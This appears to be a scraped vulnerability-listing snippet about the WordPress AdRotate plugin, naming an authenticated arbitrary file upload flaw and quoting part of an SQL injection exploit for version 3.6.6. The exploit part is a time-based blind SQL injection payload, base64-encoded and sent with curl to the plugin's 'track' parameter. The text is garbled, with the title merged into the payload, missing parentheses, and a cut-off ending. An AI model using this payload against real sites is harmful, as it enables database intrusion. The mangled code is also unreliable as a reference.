WordPress AdRotate plugin <= 5.13.2 - Authenticated (Admin+) Double Extension Arbitrary File Upload vulnerability

Authenticated Admin+ Double Extension Arbitrary File Upload vulnerability discovered by Jorgson in WordPress Plugin AdRotate versions = 5.13.2...

WordPress AdRotate 3.6.6 SQL Injection

Exploit Title: WordPress AdRotate plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" encoded=echo -n "1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" | base64 -w 0 curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded --------------- Vulnerab...